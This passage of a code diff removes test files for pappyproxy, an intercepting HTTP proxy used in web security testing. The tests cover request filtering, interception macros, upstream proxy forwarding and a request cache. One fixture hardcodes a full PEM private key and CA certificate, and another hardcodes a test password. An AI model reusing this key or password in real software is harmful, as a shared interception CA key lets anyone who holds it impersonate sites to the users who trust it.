rsp.headers['OtherHeader'] = 'sexy'
rsp.headers['Header'] = 'foo'
assert f1(r)
assert not fn1(r)
assert f2(r)
assert not fn2(r)
def test_filter_by_path(http_request):
f = context.gen_filter_by_path(['ct', 'porn']) # find the fun websites
fn = context.gen_filter_by_path(['nct', 'porn']) # find the boring websites
http_request.start_line = 'GET / HTTP/1.1'
assert not f(http_request)
assert fn(http_request)
http_request.start_line = 'GET /path/to/great/porn HTTP/1.1'
assert f(http_request)
assert not fn(http_request)
http_request.start_line = 'GET /path/to/porn/great HTTP/1.1'
assert f(http_request)
assert not fn(http_request)
def test_gen_filter_by_submitted_cookies():
f1 = context.gen_filter_by_submitted_cookies(['ct', 'Session'])
f2 = context.gen_filter_by_submitted_cookies(['ct', 'Cookie', 'nct', 'CookieVal'])
r = Request(('GET / HTTP/1.1\r\n'
'Cookie: foo=bar\r\n'
'\r\n'))
assert not f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Cookie: Session=bar\r\n'
'\r\n'))
assert f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Cookie: Session=bar; CookieThing=NoMatch\r\n'
'\r\n'))
assert f1(r)
assert f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Cookie: Session=bar; CookieThing=CookieValue\r\n'
'\r\n'))
assert f1(r)
assert not f2(r)
def test_gen_filter_by_set_cookies():
f1 = context.gen_filter_by_set_cookies(['ct', 'Session'])
f2 = context.gen_filter_by_set_cookies(['ct', 'Cookie', 'ct', 'CookieVal'])
r = Request('GET / HTTP/1.1\r\n\r\n')
rsp = Response(('HTTP/1.1 200 OK\r\n'
'Set-Cookie: foo=bar\r\n'
'\r\n'))
r.response = rsp
assert not f1(r)
assert not f2(r)
r = Request('GET / HTTP/1.1\r\n\r\n')
rsp = Response(('HTTP/1.1 200 OK\r\n'
'Set-Cookie: foo=bar\r\n'
'Set-Cookie: Session=Banana\r\n'
'\r\n'))
r.response = rsp
assert f1(r)
assert not f2(r)
r = Request('GET / HTTP/1.1\r\n\r\n')
rsp = Response(('HTTP/1.1 200 OK\r\n'
'Set-Cookie: foo=bar\r\n'
'Set-Cookie: Session=Banana\r\n'
'Set-Cookie: CookieThing=NoMatch\r\n'
'\r\n'))
r.response = rsp
assert f1(r)
assert not f2(r)
r = Request('GET / HTTP/1.1\r\n\r\n')
rsp = Response(('HTTP/1.1 200 OK\r\n'
'Set-Cookie: foo=bar\r\n'
'Set-Cookie: Session=Banana\r\n'
'Set-Cookie: CookieThing=CookieValue\r\n'
'\r\n'))
r.response = rsp
assert f1(r)
assert f2(r)
def test_filter_by_params_get():
f1 = context.gen_filter_by_params(['ct', 'Session'])
f2 = context.gen_filter_by_params(['ct', 'Cookie', 'ct', 'CookieVal'])
r = Request('GET / HTTP/1.1\r\n\r\n')
assert not f1(r)
assert not f2(r)
r = Request('GET /?Session=foo HTTP/1.1\r\n\r\n')
assert f1(r)
assert not f2(r)
r = Request('GET /?Session=foo&CookieThing=Fail HTTP/1.1\r\n\r\n')
assert f1(r)
assert not f2(r)
r = Request('GET /?Session=foo&CookieThing=CookieValue HTTP/1.1\r\n\r\n')
assert f1(r)
assert f2(r)
def test_filter_by_params_post():
f1 = context.gen_filter_by_params(['ct', 'Session'])
f2 = context.gen_filter_by_params(['ct', 'Cookie', 'ct', 'CookieVal'])
r = Request(('GET / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n\r\n'))
r.body = 'foo=bar'
assert not f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n\r\n'))
r.body = 'Session=bar'
assert f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n\r\n'))
r.body = 'Session=bar&Cookie=foo'
assert f1(r)
assert not f2(r)
r = Request(('GET / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n\r\n'))
r.body = 'Session=bar&CookieThing=CookieValue'
assert f1(r)
assert f2(r)

View file

@ -1,62 +0,0 @@
import os
import pytest
import random
import string
from pappyproxy.session import Session
from pappyproxy.crypto import Crypto
from pappyproxy.config import PappyConfig
@pytest.fixture
def conf():
c = PappyConfig()
return c
@pytest.fixture
def crypt():
c = Crypto(conf())
return c
@pytest.fixture
def tmpname():
cns = string.ascii_lowercase + string.ascii_uppercase + string.digits
tn = ''
for i in xrange(8):
tn += cns[random.randint(0,len(cns)-1)]
return tn
tmpdir = '/tmp/test_crypto'+tmpname()
tmpfiles = ['cmdhistory', 'config.json', 'data.db']
tmp_pass = 'fugyeahbruh'
def stub_files():
enter_tmpdir()
for sf in tmpfiles:
with os.fdopen(os.open(sf, os.O_CREAT, 0o0600), 'r'):
pass
def enter_tmpdir():
if not os.path.isdir(tmpdir):
os.mkdir(tmpdir)
os.chdir(tmpdir)
def test_decrypt_tmpdir():
enter_tmpdir()
c = crypt()
# Stub out the password, working with stdout is a pain with pytest
c.password = tmp_pass
c.decrypt_project()
assert os.path.isdir(os.path.join(os.getcwd(), '../crypt'))
def test_decrypt_copy_files():
enter_tmpdir()
stub_files()
c = crypt()
# Stub out the password, working with stdout is a pain with pytest
c.password = tmp_pass
c.decrypt_project()
for tf in tmpfiles:
assert os.path.isfile(os.path.join(os.getcwd(),tf))

File diff suppressed because it is too large Load diff

View file

@ -1,65 +0,0 @@
import pytest
import string
import mock
from collections import OrderedDict
from testutil import mock_deferred, func_deleted, TLSStringTransport, freeze, mock_int_macro, no_tcp
from pappyproxy.http import Request, Response
from pappyproxy import macros
class CloudToButtMacro(macros.InterceptMacro):
def __init__(self):
macros.InterceptMacro.__init__(self)
self.intercept_requests = True
self.intercept_responses = True
def mangle_request(self, request):
return Request(string.replace(request.full_message, 'cloud', 'butt'))
def mangle_response(self, response):
return Response(string.replace(response.full_message, 'cloud', 'butt'))
@pytest.fixture
def httprequest():
return Request(('POST /test-request HTTP/1.1\r\n'
'Content-Length: 4\r\n'
'\r\n'
'AAAA'))
@pytest.inlineCallbacks
def test_mangle_request_simple(httprequest):
orig_req = httprequest.copy() # in case it gets mangled
(new_req, mangled) = yield macros.mangle_request(orig_req, {})
assert new_req == orig_req
assert httprequest == orig_req
assert not mangled
@pytest.inlineCallbacks
def test_mangle_request_single(httprequest):
orig_req = httprequest.copy() # in case it gets mangled
macro = mock_int_macro(modified_req=('GET /modified HTTP/1.1\r\n\r\n'))
expected_req = Request('GET /modified HTTP/1.1\r\n\r\n')
(new_req, mangled) = yield macros.mangle_request(orig_req, {'testmacro': macro})
assert new_req == expected_req
assert httprequest == orig_req
assert httprequest.unmangled is None
assert new_req.unmangled == orig_req
assert mangled
@pytest.inlineCallbacks
def test_mangle_request_multiple(httprequest):
orig_req = httprequest.copy() # in case it gets mangled
macro = mock_int_macro(modified_req=('GET /cloud HTTP/1.1\r\n\r\n'))
macro2 = CloudToButtMacro()
intmacros = OrderedDict()
intmacros['testmacro'] = macro
intmacros['testmacro2'] = macro2
(new_req, mangled) = yield macros.mangle_request(orig_req, intmacros)
expected_req = Request('GET /butt HTTP/1.1\r\n\r\n')
assert new_req == expected_req
assert httprequest == orig_req
assert httprequest.unmangled is None
assert new_req.unmangled == orig_req
assert mangled

View file

@ -1,422 +0,0 @@
import pytest
import mock
import random
import datetime
import pappyproxy
import base64
import collections
from pappyproxy import http
from pappyproxy.proxy import ProxyClientFactory, ProxyServerFactory, UpstreamHTTPProxyClient
from pappyproxy.http import Request, Response
from pappyproxy.macros import InterceptMacro
from testutil import mock_deferred, func_deleted, TLSStringTransport, freeze, mock_int_macro, no_tcp
from twisted.internet import defer
class InterceptMacroTest(InterceptMacro):
def __init__(self, new_req=None, new_rsp=None):
InterceptMacro.__init__(self)
self.new_req = None
self.new_rsp = None
if new_req:
self.intercept_requests = True
self.new_req = new_req
if new_rsp:
self.intercept_responses = True
self.new_rsp = new_rsp
def mangle_request(self, request):
if self.intercept_requests:
return self.new_req
else:
return request
def mangle_response(self, request):
if self.intercept_responses:
return self.new_rsp
else:
return request.response
class TestProxyConnection(object):
@property
def client_protocol(self):
if 'protocol' not in self.conn_info:
raise Exception('Connection to server not made. Cannot write data as server.')
return self.conn_info['protocol']
@property
def client_factory(self):
if 'protocol' not in self.conn_info:
raise Exception('Connection to server not made. Cannot write data as server.')
return self.conn_info['factory']
def setUp(self, mocker, int_macros={}, socks_config=None, http_config=None, in_scope=True):
self.mocker = mocker
self.conn_info = {}
# Mock config
self.mock_config = pappyproxy.config.PappyConfig()
self.mock_config.socks_proxy = socks_config
self.mock_config.http_proxy = http_config
self.mock_session = pappyproxy.pappy.PappySession(self.mock_config)
mocker.patch.object(pappyproxy.pappy, 'session', new=self.mock_session)
mocker.patch("pappyproxy.proxy.load_certs_from_dir", new=mock_generate_cert)
# Listening server
self.server_factory = ProxyServerFactory()
self.server_factory.save_all = True
self.server_factory.intercepting_macros = int_macros
self.server_protocol = self.server_factory.buildProtocol(('127.0.0.1', 0))
self.server_transport = TLSStringTransport()
self.server_protocol.makeConnection(self.server_transport)
# Other mocks
self.req_save = mocker.patch.object(pappyproxy.http.Request, 'async_deep_save', autospec=True, side_effect=mock_req_async_save)
self.submit_request = mocker.patch('pappyproxy.http.Request.submit_request',
new=self.gen_mock_submit_request())
self.get_endpoint = mocker.patch('pappyproxy.proxy.get_endpoint')
self.in_scope = mocker.patch('pappyproxy.context.in_scope').return_value = in_scope
def gen_mock_submit_request(self):
orig = Request.submit_request
def f(request, save_request=False, intercepting_macros={}, stream_transport=None):
return orig(request, save_request=save_request,
intercepting_macros=intercepting_macros,
stream_transport=stream_transport,
_factory_string_transport=True,
_conn_info=self.conn_info)
return f
def perform_connect_request(self):
self.write_as_browser('CONNECT https://www.AAAA.BBBB:443 HTTP/1.1\r\n\r\n')
assert self.read_as_browser() == 'HTTP/1.1 200 Connection established\r\n\r\n'
def write_as_browser(self, data):
self.server_protocol.dataReceived(data)
def read_as_browser(self):
s = self.server_protocol.transport.value()
self.server_protocol.transport.clear()
return s
def write_as_server(self, data):
self.client_protocol.dataReceived(data)
def read_as_server(self):
s = self.client_protocol.transport.value()
self.client_protocol.transport.clear()
return s
def mock_req_async_save(req):
req.reqid = str(random.randint(1,1000000))
return mock_deferred()
def mock_mangle_response_side_effect(new_rsp):
def f(request, mangle_macros):
request.response = new_rsp
return mock_deferred(True)
return f
def mock_generate_cert(cert_dir):
private_key = ('-----BEGIN PRIVATE KEY-----\n'
'MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDAoClrYUEB7lM0\n'
'zQaKkXZVG2d1Bu9hV8urpx0gNXMbyZ2m3xb+sKZju/FHPuWenA4KaN5gRUT+oLfv\n'
'tnF6Ia0jpRNWnX0Fyn/irdg1BWGJn7k7mJ2D0NXZQczn2+xxY05599NfGWqNKCYy\n'
'jhSwPsUK+sGJqi7aSDdlS97ZTjrQVTTFsC0+kSu4lS5fsWXxqrKLa6Ao8W7abVRO\n'
'JHazh/cxM4UKpgWU+E6yD4o4ZgHY+SMTVUh/IOM8DuOVyLEWtx4oLNiLMlpWT3qy\n'
'4IMpOF6VuU6JF2HGV13SoJfhsLXsPRbLVTAnZvJcZwtgDm6NfKapU8W8olkDV1Bf\n'
'YQEMSNX7AgMBAAECggEBAII0wUrAdrzjaIMsg9tu8FofKBPHGFDok9f4Iov/FUwX\n'
'QOXnrxeCOTb5d+L89SH9ws/ui0LwD+8+nJcA8DvqP6r0jtnhov0jIMcNVDSi6oeo\n'
'3AEY7ICJzcQJ4oRn+K+8vPNdPhfuikPYe9l4iSuJgpAlaGWyD/GlFyz12DFz2/Wu\n'
'NIcqR1ucvezRHn3eGMtvDv2WGaN4ifUc30k8XgSUesmwSI6beb5+hxq7wXfsurnP\n'
'EUrPY9ts3lfiAgxzTKOuj1VR5hn7cJyLN8jF0mZs4D6eSSHorIddhmaNiCq5ZbMd\n'
'QdlDiPvnXHT41OoXOb7tDEt7SGoiRh2noCZ1aZiSziECgYEA+tuPPLYWU6JRB6EW\n'
'PhbcXQbh3vML7eT1q7DOz0jYCojgT2+k7EWSI8T830oQyjbpe3Z86XEgH7UBjUgq\n'
'27nJ4E6dQDYGbYCKEklOoCGLE7A60i1feIz8otOQRrbQ4jcpibEgscA6gzHmunYf\n'
'De5euUgYW+Rq2Vmr6/NzUaUgui8CgYEAxJMDwPOGgiLM1cczlaSIU9Obz+cVnwWn\n'
'nsdKYMto2V3yKLydDfjsgOgzxHOxxy+5L645TPxK6CkiISuhJ93kAFFtx+1sCBCT\n'
'tVzY5robVAekxA9tlPIxtsn3+/axx3n6HnV0oA/XtxkuOS5JImgEdXqFwJZkerGE\n'
'waftIU2FCfUCgYEArl8+ErJzlJEIiCgWIPSdGuD00pfZW/TCPCT7rKRy3+fDHBR7\n'
'7Gxzp/9+0utV/mnrJBH5w/8JmGCmgoF+oRtk01FyBzdGgolN8GYajD6kwPvH917o\n'
'tRAzcC9lY3IigoxbiEWid0wqoBVoz4XaEkH2gA44OG/vQcQOOEYSi9cfh6sCgYBg\n'
'KLaOXdJvuIxRCzgNvMW/k+VFh3pJJx//COg2f2qT4mQCT3nYiutOh8hDEoFluc+y\n'
'Jlz7bvNJrE14wnn8IYxWJ383bMoLC+jlsDyeaW3S5kZQbmehk/SDwTrg86W1udKD\n'
'sdtSLU3N0LCO4jh+bzm3Ki9hrXALoOkbPoU+ZEhvPQKBgQDf79XQ3RNxZSk+eFyq\n'
'qD8ytVqxEoD+smPDflXXseVH6o+pNWrF8+A0KqmO8c+8KVzWj/OfULO6UbKd3E+x\n'
'4JGkWu9yF1lEgtHgibF2ER8zCSIL4ikOEasPCkrKj5SrS4Q+j4u5ha76dIc2CVu1\n'
'hkX2PQ1xU4ocu06k373sf73A4Q==\n'
'-----END PRIVATE KEY-----')
ca_key = ('-----BEGIN CERTIFICATE-----\n'
'MIIDjzCCAncCFQCjC8r+I4xa7JoGUJYGOTcqDROA0DANBgkqhkiG9w0BAQsFADBg\n'
'MQswCQYDVQQGEwJVUzERMA8GA1UECBMITWljaGlnYW4xEjAQBgNVBAcTCUFubiBB\n'
'cmJvcjEUMBIGA1UEChMLUGFwcHkgUHJveHkxFDASBgNVBAMTC1BhcHB5IFByb3h5\n'
'MB4XDTE1MTEyMDIxMTEzOVoXDTI1MTExNzIxMTEzOVowYDELMAkGA1UEBhMCVVMx\n'
'ETAPBgNVBAgTCE1pY2hpZ2FuMRIwEAYDVQQHEwlBbm4gQXJib3IxFDASBgNVBAoT\n'
'C1BhcHB5IFByb3h5MRQwEgYDVQQDEwtQYXBweSBQcm94eTCCASIwDQYJKoZIhvcN\n'
'AQEBBQADggEPADCCAQoCggEBAMCgKWthQQHuUzTNBoqRdlUbZ3UG72FXy6unHSA1\n'
'cxvJnabfFv6wpmO78Uc+5Z6cDgpo3mBFRP6gt++2cXohrSOlE1adfQXKf+Kt2DUF\n'
'YYmfuTuYnYPQ1dlBzOfb7HFjTnn3018Zao0oJjKOFLA+xQr6wYmqLtpIN2VL3tlO\n'
'OtBVNMWwLT6RK7iVLl+xZfGqsotroCjxbtptVE4kdrOH9zEzhQqmBZT4TrIPijhm\n'
'Adj5IxNVSH8g4zwO45XIsRa3Higs2IsyWlZPerLggyk4XpW5TokXYcZXXdKgl+Gw\n'
'tew9FstVMCdm8lxnC2AObo18pqlTxbyiWQNXUF9hAQxI1fsCAwEAAaNFMEMwEgYD\n'
'VR0TAQH/BAgwBgEB/wIBADAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFNo5o+5e\n'
'a0sNMlW/75VgGJCv2AcJMA0GCSqGSIb3DQEBCwUAA4IBAQBdJDhxbmoEe27bD8me\n'
'YTcLGjs/StKkSil7rLbX+tBCwtkm5UEEejBuAhKk2FuAXW8yR1FqKJSZwVCAocBT\n'
'Bo/+97Ee+h7ywrRFhATEr9D/TbbHKOjCjDzOMl9yLZa2DKErZjbI30ZD6NafWS/X\n'
'hx5X1cGohHcVVzT4jIgUEU70vvYfNn8CTZm4oJ7qqRe/uQPUYy0rwvbd60oprtGg\n'
'jNv1H5R4ODHUMBXAI9H7ft9cWrd0fBQjxhoj8pvgJXEZ52flXSqQc7qHLg1wO/zC\n'
'RUgpTcNAb2qCssBKbj+c1vKEPRUJfw6UYb0s1462rQNc8BgZiKaNbwokFmkAnjUg\n'
'AvnX\n'
'-----END CERTIFICATE-----')
return (ca_key, private_key)
########
## Tests
def test_no_tcp():
from twisted.internet.endpoints import SSL4ClientEndpoint, TCP4ClientEndpoint
from txsocksx.client import SOCKS5ClientEndpoint
from txsocksx.tls import TLSWrapClientEndpoint
with pytest.raises(NotImplementedError):
SSL4ClientEndpoint('aasdfasdf.sdfwerqwer')
with pytest.raises(NotImplementedError):
TCP4ClientEndpoint('aasdfasdf.sdfwerqwer')
with pytest.raises(NotImplementedError):
SOCKS5ClientEndpoint('aasdfasdf.sdfwerqwer')
with pytest.raises(NotImplementedError):
TLSWrapClientEndpoint('asdf.2341')
def test_proxy_server_connect(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:443 HTTP/1.1\r\n\r\n')
rsp = proxy.read_as_browser()
print rsp
assert rsp == 'HTTP/1.1 200 Connection established\r\n\r\n'
def test_proxy_server_forward_basic(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'Host: www.AAAA.BBBB\r\n'
'\r\n'
'ABCD')
rsp_contents = ('HTTP/1.1 200 OK\r\n\r\n')
proxy.write_as_browser(req_contents)
assert proxy.read_as_server() == req_contents
proxy.write_as_server(rsp_contents)
assert proxy.read_as_browser() == rsp_contents
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80, False, socks_config=None, use_http_proxy=True)
assert proxy.req_save.called
def test_proxy_server_forward_basic_ssl(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
proxy.perform_connect_request()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
rsp_contents = ('HTTP/1.1 200 OK\r\n\r\n')
proxy.write_as_browser(req_contents)
assert proxy.read_as_server() == req_contents
proxy.write_as_server(rsp_contents)
assert proxy.read_as_browser() == rsp_contents
assert proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 443, True, socks_config=None, use_http_proxy=True)
def test_proxy_server_connect_uri(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:443 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
assert proxy.client_protocol.transport.startTLS.called
assert proxy.client_factory.request.host == 'www.AAAA.BBBB'
assert proxy.client_factory.request.port == 443
assert proxy.client_factory.request.is_ssl == True
assert proxy.read_as_server() == req_contents
assert proxy.client_protocol.transport.startTLS.called
assert proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 443, True, socks_config=None, use_http_proxy=True)
def test_proxy_server_connect_uri_alt_port(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:80085 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
assert proxy.client_factory.request.host == 'www.AAAA.BBBB'
assert proxy.client_factory.request.port == 80085
assert proxy.client_factory.request.is_ssl == True
assert proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80085, True, socks_config=None, use_http_proxy=True)
def test_proxy_server_socks_basic(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker, socks_config={'host': 'www.banana.faketld', 'port': 1337})
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:80085 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80085, True,
socks_config={'host':'www.banana.faketld', 'port':1337},
use_http_proxy=True)
def test_proxy_server_http_basic(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker, http_config={'host': 'www.banana.faketld', 'port': 1337})
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:80085 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
assert proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80085, True,
socks_config=None,
use_http_proxy=True)
def test_proxy_server_360_noscope(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker, in_scope=False, socks_config={'host': 'www.banana.faketld', 'port': 1337})
proxy.write_as_browser('CONNECT https://www.AAAA.BBBB:80085 HTTP/1.1\r\n\r\n')
proxy.read_as_browser()
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'\r\n'
'ABCD')
proxy.write_as_browser(req_contents)
assert not proxy.req_save.called
proxy.get_endpoint.assert_called_with('www.AAAA.BBBB', 80085, True,
socks_config=None,
use_http_proxy=False)
def test_proxy_server_macro_simple(mocker):
proxy = TestProxyConnection()
new_req_contents = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
new_rsp_contents = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
new_req = Request(new_req_contents)
new_rsp = Response(new_rsp_contents)
test_macro = InterceptMacroTest(new_req=new_req, new_rsp=new_rsp)
proxy.setUp(mocker, int_macros={'test_macro': test_macro})
proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
assert proxy.read_as_server() == new_req_contents
proxy.write_as_server('HTTP/1.1 404 NOT FOUND\r\n\r\n')
assert proxy.read_as_browser() == new_rsp_contents
def test_proxy_server_macro_multiple(mocker):
proxy = TestProxyConnection()
new_req_contents1 = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
new_rsp_contents1 = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
new_req1 = Request(new_req_contents1)
new_rsp1 = Response(new_rsp_contents1)
new_req_contents2 = 'GET / HTTP/1.1\r\nMangled: Very very yes\r\n\r\n'
new_rsp_contents2 = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very very yes\r\n\r\n'
new_req2 = Request(new_req_contents2)
new_rsp2 = Response(new_rsp_contents2)
test_macro1 = InterceptMacroTest(new_req=new_req1, new_rsp=new_rsp1)
test_macro2 = InterceptMacroTest(new_req=new_req2, new_rsp=new_rsp2)
macros = collections.OrderedDict()
macros['macro1'] = test_macro1
macros['macro2'] = test_macro2
proxy.setUp(mocker, int_macros=macros)
proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
assert proxy.read_as_server() == new_req_contents2
proxy.write_as_server('HTTP/1.1 404 NOT FOUND\r\n\r\n')
assert proxy.read_as_browser() == new_rsp_contents2
def test_proxy_server_macro_360_noscope(mocker):
proxy = TestProxyConnection()
new_req_contents = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
new_rsp_contents = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
new_req = Request(new_req_contents)
new_rsp = Response(new_rsp_contents)
test_macro = InterceptMacroTest(new_req=new_req, new_rsp=new_rsp)
proxy.setUp(mocker, int_macros={'test_macro': test_macro}, in_scope=False)
proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
assert proxy.read_as_server() == 'GET /serious.php HTTP/1.1\r\n\r\n'
proxy.write_as_server('HTTP/1.1 404 NOT FOUND\r\n\r\n')
assert proxy.read_as_browser() == 'HTTP/1.1 404 NOT FOUND\r\n\r\n'
def test_proxy_server_stream_simple(mocker):
proxy = TestProxyConnection()
proxy.setUp(mocker)
req_contents = ('POST /fooo HTTP/1.1\r\n'
'Test-Header: foo\r\n'
'Content-Length: 4\r\n'
'Host: www.AAAA.BBBB\r\n'
'\r\n'
'ABCD')
rsp_contents = ('HTTP/1.1 200 OK\r\n\r\n')
proxy.write_as_browser(req_contents)
assert proxy.read_as_server() == req_contents
proxy.write_as_server(rsp_contents[:20])
assert proxy.read_as_browser() == rsp_contents[:20]
proxy.write_as_server(rsp_contents[20:])
assert proxy.read_as_browser() == rsp_contents[20:]
def test_proxy_server_macro_stream(mocker):
proxy = TestProxyConnection()
new_req_contents = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
new_rsp_contents = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
new_req = Request(new_req_contents)
new_rsp = Response(new_rsp_contents)
test_macro = InterceptMacroTest(new_req=new_req, new_rsp=new_rsp)
proxy.setUp(mocker, int_macros={'test_macro': test_macro})
proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
assert proxy.read_as_server() == new_req_contents
proxy.write_as_server('HTTP/1.1 404 ')
assert proxy.read_as_browser() == ''
proxy.write_as_server('NOT FOUND\r\n\r\n')
assert proxy.read_as_browser() == new_rsp_contents
# It doesn't stream if out of scope and macros are active, but whatever.
# def test_proxy_server_macro_stream_360_noscope(mocker):
# proxy = TestProxyConnection()
# new_req_contents = 'GET / HTTP/1.1\r\nMangled: Very yes\r\n\r\n'
# new_rsp_contents = 'HTTP/1.1 200 OKILIE DOKILIE\r\nMangled: Very yes\r\n\r\n'
# new_req = Request(new_req_contents)
# new_rsp = Response(new_rsp_contents)
# test_macro = InterceptMacroTest(new_req=new_req, new_rsp=new_rsp)
# proxy.setUp(mocker, int_macros={'test_macro': test_macro}, in_scope=False)
# proxy.write_as_browser('GET /serious.php HTTP/1.1\r\n\r\n')
# assert proxy.read_as_server() == 'GET /serious.php HTTP/1.1\r\n\r\n'
# proxy.write_as_server('HTTP/1.1 404 ')
# assert proxy.read_as_browser() == 'HTTP/1.1 404 '
# proxy.write_as_server('NOT FOUND\r\n\r\n')
# assert proxy.read_as_browser() == 'NOT FOUND\r\n\r\n'

View file

@ -1,133 +0,0 @@
import pytest
from pappyproxy.requestcache import RequestCache, RequestCacheIterator
from pappyproxy.http import Request, Response, get_request
from pappyproxy.util import PappyException
def gen_reqs(n):
ret = []
for i in range(1, n+1):
r = get_request('https://www.kdjasdasdi.sadfasdf')
r.headers['Test-Id'] = i
r.reqid = str(i)
ret.append(r)
return ret
@pytest.inlineCallbacks
def test_cache_simple():
reqs = gen_reqs(5)
cache = RequestCache(5)
cache.add(reqs[0])
g = yield cache.get('1')
assert g == reqs[0]
def test_cache_evict():
reqs = gen_reqs(5)
cache = RequestCache(3)
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert not cache.check(reqs[0].reqid)
assert cache.check(reqs[1].reqid)
assert cache.check(reqs[2].reqid)
assert cache.check(reqs[3].reqid)
# Testing the implementation
assert reqs[0].reqid not in cache._cached_reqs
assert reqs[1].reqid in cache._cached_reqs
assert reqs[2].reqid in cache._cached_reqs
assert reqs[3].reqid in cache._cached_reqs
@pytest.inlineCallbacks
def test_cache_lru():
reqs = gen_reqs(5)
cache = RequestCache(3)
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
yield cache.get(reqs[0].reqid)
cache.add(reqs[3])
assert cache.check(reqs[0].reqid)
assert not cache.check(reqs[1].reqid)
assert cache.check(reqs[2].reqid)
assert cache.check(reqs[3].reqid)
# Testing the implementation
assert reqs[0].reqid in cache._cached_reqs
assert reqs[1].reqid not in cache._cached_reqs
assert reqs[2].reqid in cache._cached_reqs
assert reqs[3].reqid in cache._cached_reqs
@pytest.inlineCallbacks
def test_cache_lru_add():
reqs = gen_reqs(5)
cache = RequestCache(3)
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
yield cache.add(reqs[0])
cache.add(reqs[3])
assert cache.check(reqs[0].reqid)
assert not cache.check(reqs[1].reqid)
assert cache.check(reqs[2].reqid)
assert cache.check(reqs[3].reqid)
# Testing the implementation
assert reqs[0].reqid in cache._cached_reqs
assert reqs[1].reqid not in cache._cached_reqs
assert reqs[2].reqid in cache._cached_reqs
assert reqs[3].reqid in cache._cached_reqs
@pytest.inlineCallbacks
def test_cache_inmem_simple():
cache = RequestCache(3)
req = gen_reqs(1)[0]
req.reqid = None
cache.add(req)
assert req.reqid[0] == 'm'
g = yield cache.get(req.reqid)
assert req == g
def test_cache_inmem_evict():
reqs = gen_reqs(5)
cache = RequestCache(3)
reqs[0].reqid = None
reqs[1].reqid = None
reqs[2].reqid = None
reqs[3].reqid = None
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert not cache.check(reqs[0].reqid)
assert cache.check(reqs[1].reqid)
assert cache.check(reqs[2].reqid)
assert cache.check(reqs[3].reqid)
# Testing the implementation
assert reqs[0] in cache.inmem_reqs
assert reqs[1] in cache.inmem_reqs
assert reqs[2] in cache.inmem_reqs
assert reqs[3] in cache.inmem_reqs
def test_req_ids():
reqs = gen_reqs(5)
cache = RequestCache(3)
